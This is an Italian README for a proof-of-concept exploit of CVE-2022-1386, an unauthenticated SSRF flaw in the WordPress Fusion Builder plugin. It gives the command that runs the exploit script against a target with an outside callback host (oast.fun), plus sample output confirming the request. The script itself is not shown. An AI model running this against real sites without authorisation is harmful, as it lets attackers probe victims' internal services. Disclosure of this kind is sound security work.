
PoC di SSRF non autenticato in WordPress Fusion Builder <3.6.2 (CVE-2022-1386)
Server-Side Request Forgery (SSRF) non autenticata nel plugin Fusion Builder (usato dal tema Avada di WordPress) precedente alla versione 3.6.2.
Consente agli aggressori di effettuare richieste HTTP verso URL arbitrari, potenzialmente prendendo di mira servizi interni.
admin-ajax.phppython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
Esempio:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
Usa Interact.sh o [Burp Collaborator] per ricevere il callback.
📋 Output di esempio
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
📌 Note Questo PoC evita l'esfiltrazione dei dati. Solo uso etico: non sfruttare sistemi senza autorizzazione.
📚 Riferimenti https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/